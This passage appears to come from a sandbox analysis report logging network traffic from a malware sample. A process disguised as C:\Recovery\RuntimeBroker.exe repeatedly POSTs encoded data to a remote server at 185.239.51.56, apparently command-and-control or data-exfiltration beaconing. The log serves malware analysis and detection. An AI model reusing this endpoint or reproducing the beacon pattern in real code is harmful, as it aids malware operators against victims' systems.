                                                                                                  Jan 1, 2025 02:28:23.737704039 CET2504OUTData Raw: 56 5e 5b 52 5a 56 5e 54 5f 5a 5a 53 57 5d 56 51 5f 55 5d 46 51 54 57 51 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V^[RZV^T_ZZSW]VQ_U]FQTWQ^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$)/-!?%;*<7%<8"&"7+,';;17%-="^%#[.6
                                                                                                  Jan 1, 2025 02:28:24.099061966 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:24.107224941 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:23 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  97192.168.2.450032185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:24.244795084 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:24.601005077 CET2504OUTData Raw: 56 5d 5e 5f 5f 5f 5b 5c 5f 5a 5a 53 57 50 56 53 5f 5a 5d 42 51 51 57 5a 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V]^___[\_ZZSWPVS_Z]BQQWZ^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$?<._"X20#;[2+B2^*;%52 /W%+%'.-"^%#[.
                                                                                                  Jan 1, 2025 02:28:24.975083113 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:24.982053995 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:24 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  98192.168.2.450037185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:25.112451077 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:25.456471920 CET2504OUTData Raw: 56 5a 5e 56 5f 5c 5e 57 5f 5a 5a 53 57 5e 56 5f 5f 5f 5d 43 51 55 57 58 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: VZ^V_\^W_ZZSW^V___]CQUWX^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['E+/=6 1Z,-\($2*8=^""( $+&$9:"^%#[.
                                                                                                  Jan 1, 2025 02:28:25.813241005 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:25.820875883 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:25 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  99192.168.2.450042185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:25.946335077 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:26.300261021 CET2504OUTData Raw: 56 5d 5b 54 5a 59 5b 5d 5f 5a 5a 53 57 5a 56 56 5f 5c 5d 45 51 52 57 50 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V][TZY[]_ZZSWZVV_\]EQRWP^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$+?6X!" Z&3 /[)?2(+>"%>7;?Q$?&42X-"^%#[.*
                                                                                                  Jan 1, 2025 02:28:26.667474031 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:26.804352999 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:26 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  100192.168.2.450049185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:26.924673080 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:27.268997908 CET2504OUTData Raw: 56 52 5b 52 5a 5c 5b 53 5f 5a 5a 53 57 5e 56 56 5f 5d 5d 45 51 52 57 5d 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: VR[RZ\[S_ZZSW^VV_]]EQRW]^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$)<2Z6$1 8-9('2+(!Y5" (';&'2:="^%#[.
                                                                                                  Jan 1, 2025 02:28:27.644191980 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:27.653598070 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:27 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  101192.168.2.450055185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:27.790401936 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:28.144143105 CET2504OUTData Raw: 56 5f 5b 53 5f 5f 5e 53 5f 5a 5a 53 57 5f 56 56 5f 59 5d 46 51 5c 57 51 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V_[S__^S_ZZSW_VV_Y]FQ\WQ^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['C<,!18\%38-%+*<!^5C) 8<%+&::"^%#[.>
                                                                                                  Jan 1, 2025 02:28:28.488733053 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:28.497087955 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:28 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  102192.168.2.450063185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:28.629920006 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  103192.168.2.450066185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:28.977993965 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 1600
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:29.331475019 CET1600OUTData Raw: 56 5c 5b 52 5f 58 5e 57 5f 5a 5a 53 57 58 56 50 5f 58 5d 43 51 50 57 51 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V\[R_X^W_ZZSWXVP_X]CQPWQ^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['C+/5"13%8,:+*(+=^"%#8#0(#%2--"^%#[."
                                                                                                  Jan 1, 2025 02:28:29.681766033 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:29.688855886 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:29 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  104192.168.2.450068185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:29.096911907 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:29.440882921 CET2504OUTData Raw: 56 5a 5e 52 5a 57 5e 54 5f 5a 5a 53 57 5c 56 50 5f 5b 5d 47 51 51 57 59 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: VZ^RZW^T_ZZSW\VP_[]GQQWY^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$<*Z"#2#;="+B"]+""C! 7'<\&=.="^%#[.2
                                                                                                  Jan 1, 2025 02:28:29.805066109 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:29.812608957 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:29 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  105192.168.2.450074185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:29.945794106 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:30.300230026 CET2504OUTData Raw: 53 59 5b 53 5a 5d 5e 51 5f 5a 5a 53 57 5c 56 52 5f 5d 5d 47 51 53 57 59 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: SY[SZ]^Q_ZZSW\VR_]]GQSWY^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['(?-6"#&7;]<1+1^6%= <';?&>.-"^%#[.2
                                                                                                  Jan 1, 2025 02:28:30.646891117 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:30.655380964 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:30 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  106192.168.2.450081185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:30.790878057 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:31.143997908 CET2504OUTData Raw: 56 58 5b 53 5a 5e 5b 5c 5f 5a 5a 53 57 5d 56 53 5f 58 5d 44 51 51 57 59 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: VX[SZ^[\_ZZSW]VS_X]DQQWY^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$(Z!!"Y&$X8>&X?4%(8*!%"Y48(']'29,="^%#[.6
                                                                                                  Jan 1, 2025 02:28:31.491914988 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:31.500221968 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:31 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  107192.168.2.450088185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:31.632669926 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:31.987731934 CET2504OUTData Raw: 56 52 5e 57 5a 57 5e 50 5f 5a 5a 53 57 5b 56 51 5f 58 5d 41 51 53 57 5f 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: VR^WZW^P_ZZSW[VQ_X]AQSW_^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$?!#!,X2#',=5<_+8957;/0;&Q>^,="^%#[..
                                                                                                  Jan 1, 2025 02:28:32.330686092 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:32.340872049 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:32 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  108192.168.2.450095185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:32.470649958 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:32.815896988 CET2504OUTData Raw: 56 5c 5e 50 5f 5d 5e 51 5f 5a 5a 53 57 50 56 51 5f 5d 5d 48 51 55 57 59 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V\^P_]^Q_ZZSWPVQ_]]HQUWY^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$?Z>"2,&;]+$1+"C2 (<'$^29-"^%#[.
                                                                                                  Jan 1, 2025 02:28:33.180649996 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:33.320827007 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:33 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  109192.168.2.450101185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:33.440710068 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:33.784689903 CET2504OUTData Raw: 53 59 5b 50 5f 5c 5b 54 5f 5a 5a 53 57 58 56 55 5f 5a 5d 40 51 57 57 5b 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: SY[P_\[T_ZZSWXVU_Z]@QWW[^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['C?<!!1,'#7/=:\?$-+81!%17;43]$^17--="^%#[."
                                                                                                  Jan 1, 2025 02:28:34.141587019 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:34.149734020 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:34 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  110192.168.2.450108185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:34.282628059 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:34.629740000 CET2504OUTData Raw: 53 5e 5e 5f 5a 5a 5b 54 5f 5a 5a 53 57 50 56 57 5f 5f 5d 40 51 5d 57 5e 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: S^^_ZZ[T_ZZSWPVW__]@Q]W^^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$+Z)!?&0(X/>:Z?"?8=[!5Y48?U084]$79-"^%#[.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  111192.168.2.450113185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:34.698033094 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 1600
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:35.052246094 CET1600OUTData Raw: 56 5e 5b 50 5a 5d 5e 50 5f 5a 5a 53 57 5b 56 54 5f 59 5d 47 51 50 57 5e 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
